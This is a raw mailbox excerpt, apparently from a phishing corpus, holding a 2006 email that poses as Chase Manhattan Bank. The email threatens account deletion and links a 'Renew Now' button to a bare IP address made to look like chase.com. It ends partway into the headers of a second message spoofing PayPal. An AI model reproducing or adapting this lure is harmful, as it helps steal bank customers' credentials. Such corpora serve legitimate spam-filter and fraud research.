From: "Account Service" <service@chase.com>
Reply-To: "Account Service" <service@chase.com>
To: nobody@example.com
Subject: Chase Manhattan Bank - Service Notification
Date: Wed, 05 Jul 2006 23:25:00 +0100
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--9530812142699956453"
X-Priority: 1
X-MSMail-Priority: High
Status: 
X-Status: 
X-Keywords:                   

----9530812142699956453
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<FONT face=3DArial size=3D2><table><tr><TD width=3D427  
          height=3D72><IMG src=3D"http://www.chase.com/ccpmweb/shared/imag=
e/chaseNewlogo.gif"></TD></tr></table><BR>
&nbsp;&nbsp;&nbsp;&nbsp;Dear Chase Manhattan Bank Member,
&nbsp; </FONT>
<DIV>
  <p><font size=3D"2" face=3D"Arial">&nbsp;&nbsp;&nbsp;&nbsp;This is your =
official notification from Chase Manhattan Bank
    that
  the<br> &nbsp;&nbsp;&nbsp;&nbsp;service(s) listed below  will be
   deactivated and deleted if not
  </font><font size=3D"2" face=3D"Arial">renewed<br>&nbsp;&nbsp;&nbsp;&nbs=
p;immediately. Previous notifications
    have been sent to the
    Billing <br>&nbsp;&nbsp;&nbsp;&nbsp;Contact assigned to this account.
    As the
    Primary Contact, 
    you must<br>&nbsp;&nbsp;&nbsp;&nbsp;renew the service(s) listed below =
or it will
    be deactivated and deleted. <br>&nbsp;&nbsp;&nbsp;&nbsp;<A onfiltered=3D=
"return ShowLinkWarning()" href=3D"http://81.73.94.10:12506/www.chase.com/=
" onclick=3D"return ShowLinkWarning()"><FONT color=3D#003399>Renew Now</FO=
NT></A></font></p>
</DIV>
<FONT face=3DArial size=3D2><DIV><FONT color=3D#003399></FONT>&nbsp;</DIV>=

</FONT><DIV><font size=3D"2" face=3D"Arial"><BR>
  &nbsp;&nbsp; SERVICE : Chase Manhattan Bank Online Banking Service<BR>
  &nbsp;&nbsp; EXPIRATION: June &nbsp;9, 2006</font></DIV>
<FONT face=3DArial size=3D2><DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; Thank you,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp;&nbsp;<FONT face=3DArial size=3D2>Chase Manhattan Bank</F=
ONT>&nbsp;Management 
  Center Customer Support</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; ****************************************************=
**********<BR>&nbsp;&nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<BR>&nbsp=
;&nbsp; **************************************************************</DI=
V>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Document Reference: (87051203).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; <FONT face=3DArial size=3D2>Chase Manhattan Bank</FONT>,=
 
  N.A. Member FDIC. Equal Housing Lender.<BR>
  &nbsp;&nbsp; Copyright =A9 2006 <FONT face=3DArial size=3D2>Chase Manhat=
tan Bank</FONT>, N.A. All rights reserved.</DIV>
</FONT>

----9530812142699956453--

From account@paypal.com  Wed Jul  5 18:45:46 2006
Return-Path: <account@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id 5F2A5469EA
	for <nobody@login.example.com>; Wed,  5 Jul 2006 18:45:46 -0400 (EDT)
Received: from 10.1.1.5 (207-255-4-184-static.aoo.pa.atlanticbb.net [207.255.4.184])
	by mail1.example.com (Postfix) with SMTP id 1F12C6CD0C9
	for <nobody@example.com>; Wed,  5 Jul 2006 18:45:46 -0400 (EDT)
Received: from 10.251.12.247 by ; Wed, 05 Jul 2006 17:40:04 -0600
Message-ID: <JGUPQUAQMCFVUKGAHERQK@msn.com>
